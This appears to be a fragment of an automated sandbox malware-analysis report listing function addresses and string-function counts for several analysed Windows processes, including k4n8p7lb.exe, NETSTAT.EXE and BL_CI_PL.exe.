        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8B0C1226_2_1E8B0C12
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8CAC2026_2_1E8CAC20
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E93EC2026_2_1E93EC20
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E96EC4C26_2_1E96EC4C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97EC6026_2_1E97EC60
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E976C6926_2_1E976C69
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8D2DB026_2_1E8D2DB0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8BAD0026_2_1E8BAD00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C0D6926_2_1E8C0D69
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E962AC026_2_1E962AC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97CA1326_2_1E97CA13
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97EA5B26_2_1E97EA5B
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E934BC026_2_1E934BC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C0B1026_2_1E8C0B10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E95C89F26_2_1E95C89F
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8D688226_2_1E8D6882
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C28C026_2_1E8C28C0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8EE81026_2_1E8EE810
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E96083526_2_1E960835
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8A686826_2_1E8A6868
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8BE9A026_2_1E8BE9A0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97E9A626_2_1E97E9A6
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C068026_2_1E8C0680
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97A6C026_2_1E97A6C0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8BC6E026_2_1E8BC6E0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8DC60026_2_1E8DC600
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8E467026_2_1E8E4670
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97675726_2_1E976757
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8CA76026_2_1E8CA760
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C276026_2_1E8C2760
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C044526_2_1E8C0445
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E98A52626_2_1E98A526
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8CE31026_2_1E8CE310
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8B00A026_2_1E8B00A0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E96E07626_2_1E96E076
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E98010E26_2_1E98010E
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C1EB227_2_1E8C1EB2
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E979ED227_2_1E979ED2
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E963FA027_2_1E963FA0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E971FC627_2_1E971FC6
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E93FF4027_2_1E93FF40
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97FF6327_2_1E97FF63
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E959C9827_2_1E959C98
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8DFCE027_2_1E8DFCE0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E947CE827_2_1E947CE8
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C3C6027_2_1E8C3C60
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C9DD027_2_1E8C9DD0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E95FDF427_2_1E95FDF4
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97FD2727_2_1E97FD27
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E973D2227_2_1E973D22
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E977D4C27_2_1E977D4C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97FA8927_2_1E97FA89
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8DFAA027_2_1E8DFAA0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E951B8027_2_1E951B80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8FDB1927_2_1E8FDB19
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97FB2E27_2_1E97FB2E
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E9398B227_2_1E9398B2
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E9718DA27_2_1E9718DA
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E9778F327_2_1E9778F3
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C380027_2_1E8C3800
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E93587027_2_1E935870
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97F87227_2_1E97F872
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C987027_2_1E8C9870
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8DB87027_2_1E8DB870
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E9059C027_2_1E9059C0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8899E827_2_1E8899E8
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97F6F627_2_1E97F6F6
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E9336EC27_2_1E9336EC
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E96162327_2_1E961623
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E95D62C27_2_1E95D62C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E96D64627_2_1E96D646
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E95549027_2_1E955490
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E92D48027_2_1E92D480
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E9775C627_2_1E9775C6
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97F5C927_2_1E97F5C9
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8AD2EC27_2_1E8AD2EC
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97124C27_2_1E97124C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8B138027_2_1E8B1380
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97F33027_2_1E97F330
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F508C27_2_1E8F508C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8CB0D027_2_1E8CB0D0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E9770F127_2_1E9770F1
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C51C027_2_1E8C51C0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8DB1E027_2_1E8DB1E0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8AF11327_2_1E8AF113
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E95D13027_2_1E95D130
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E90717A27_2_1E90717A
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E970EAD27_2_1E970EAD
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8B2EE827_2_1E8B2EE8
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E902E4827_2_1E902E48
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8E0E5027_2_1E8E0E50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E960E6D27_2_1E960E6D
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97EFBF27_2_1E97EFBF
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C6FE027_2_1E8C6FE0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8CCF0027_2_1E8CCF00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8D8CDF27_2_1E8D8CDF
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E98ACEB27_2_1E98ACEB
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8B0C1227_2_1E8B0C12
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8CAC2027_2_1E8CAC20
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E93EC2027_2_1E93EC20
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E96EC4C27_2_1E96EC4C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97EC6027_2_1E97EC60
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E976C6927_2_1E976C69
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8D2DB027_2_1E8D2DB0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8BAD0027_2_1E8BAD00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C0D6927_2_1E8C0D69
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E962AC027_2_1E962AC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97CA1327_2_1E97CA13
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97EA5B27_2_1E97EA5B
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E934BC027_2_1E934BC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C0B1027_2_1E8C0B10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E95C89F27_2_1E95C89F
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8D688227_2_1E8D6882
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C28C027_2_1E8C28C0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8EE81027_2_1E8EE810
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E96083527_2_1E960835
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8A686827_2_1E8A6868
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8BE9A027_2_1E8BE9A0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97E9A627_2_1E97E9A6
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C068027_2_1E8C0680
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97A6C027_2_1E97A6C0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8BC6E027_2_1E8BC6E0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8DC60027_2_1E8DC600
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8E467027_2_1E8E4670
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97675727_2_1E976757
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8CA76027_2_1E8CA760
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C276027_2_1E8C2760
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C044527_2_1E8C0445
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E98A52627_2_1E98A526
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E88224527_2_1E882245
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8CE31027_2_1E8CE310
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8B00A027_2_1E8B00A0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E96E07627_2_1E96E076
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E98010E27_2_1E98010E
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336E31028_2_0336E310
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0332224528_2_03322245
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0342010E28_2_0342010E
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0340E07628_2_0340E076
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033500A028_2_033500A0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341675728_2_03416757
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336276028_2_03362760
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336A76028_2_0336A760
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0337C60028_2_0337C600
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0338467028_2_03384670
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341A6C028_2_0341A6C0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336068028_2_03360680
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0335C6E028_2_0335C6E0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0342A52628_2_0342A526
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336044528_2_03360445
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03360B1028_2_03360B10
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033D4BC028_2_033D4BC0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341EA5B28_2_0341EA5B
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341CA1328_2_0341CA13
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03402AC028_2_03402AC0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0335E9A028_2_0335E9A0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341E9A628_2_0341E9A6
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0338E81028_2_0338E810
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0334686828_2_03346868
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0340083528_2_03400835
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033FC89F28_2_033FC89F
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0337688228_2_03376882
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033628C028_2_033628C0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336CF0028_2_0336CF00
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03366FE028_2_03366FE0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341EFBF28_2_0341EFBF
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03400E6D28_2_03400E6D
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03380E5028_2_03380E50
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033A2E4828_2_033A2E48
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03352EE828_2_03352EE8
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03410EAD28_2_03410EAD
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0335AD0028_2_0335AD00
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03360D6928_2_03360D69
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03372DB028_2_03372DB0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0340EC4C28_2_0340EC4C
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336AC2028_2_0336AC20
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033DEC2028_2_033DEC20
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341EC6028_2_0341EC60
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03350C1228_2_03350C12
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03416C6928_2_03416C69
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0342ACEB28_2_0342ACEB
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03378CDF28_2_03378CDF
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341F33028_2_0341F330
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0335138028_2_03351380
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341124C28_2_0341124C
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0334D2EC28_2_0334D2EC
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033FD13028_2_033FD130
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0334F11328_2_0334F113
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033A717A28_2_033A717A
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0337B1E028_2_0337B1E0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033651C028_2_033651C0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_034170F128_2_034170F1
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0339508C28_2_0339508C
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336B0D028_2_0336B0D0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0332170728_2_03321707
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0340D64628_2_0340D646
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033FD62C28_2_033FD62C
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0340162328_2_03401623
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341F6F628_2_0341F6F6
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033D36EC28_2_033D36EC
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033A555028_2_033A5550
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_034175C628_2_034175C6
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341F5C928_2_0341F5C9
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033F549028_2_033F5490
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033CD48028_2_033CD480
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0339DB1928_2_0339DB19
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341FB2E28_2_0341FB2E
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033F1B8028_2_033F1B80
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0337FAA028_2_0337FAA0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341FA8928_2_0341FA89
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033299E828_2_033299E8
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033A59C028_2_033A59C0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341F87228_2_0341F872
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336380028_2_03363800
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336987028_2_03369870
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0337B87028_2_0337B870
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033D587028_2_033D5870
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033D98B228_2_033D98B2
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_034118DA28_2_034118DA
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_034178F328_2_034178F3
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341FF6328_2_0341FF63
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033DFF4028_2_033DFF40
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03411FC628_2_03411FC6
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03403FA028_2_03403FA0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03361EB228_2_03361EB2
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03419ED228_2_03419ED2
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03417D4C28_2_03417D4C
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03413D2228_2_03413D22
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341FD2728_2_0341FD27
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033FFDF428_2_033FFDF4
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03369DD028_2_03369DD0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03363C6028_2_03363C60
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033F9C9828_2_033F9C98
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033E7CE828_2_033E7CE8
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0337FCE028_2_0337FCE0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007D8C7B28_2_007D8C7B
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007D8C8028_2_007D8C80
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007D2D9028_2_007D2D90
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 033A7BE4 appears 105 times
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0334B910 appears 280 times
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 033CE692 appears 86 times
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03395050 appears 58 times
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 033DEF10 appears 105 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 03A67BE4 appears 96 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 03A9EF10 appears 105 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 03A0B910 appears 268 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 03A55050 appears 36 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 03A8E692 appears 86 times
        Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04A8E692 appears 86 times
        Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04A55050 appears 58 times
        Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04A0B910 appears 280 times
        Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04A67BE4 appears 103 times
        Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04A9EF10 appears 105 times
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: String function: 1E8F5050 appears 36 times
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: String function: 1E93EF10 appears 105 times
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: String function: 1E907BE4 appears 91 times
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: String function: 1E8AB910 appears 268 times
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: String function: 1E92E692 appears 86 times
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: String function: 1E8F5050 appears 116 times
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: String function: 1E907C40 appears 54 times
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: String function: 1E8AB910 appears 560 times
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: String function: 1E92E692 appears 172 times
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: String function: 1E8C24D0 appears 38 times
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: String function: 1E93EF10 appears 210 times
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: String function: 1E907BE4 appears 204 times
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B42897 NtProtectVirtualMemory,1_2_02B42897
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk,10_2_1E8F2EB0
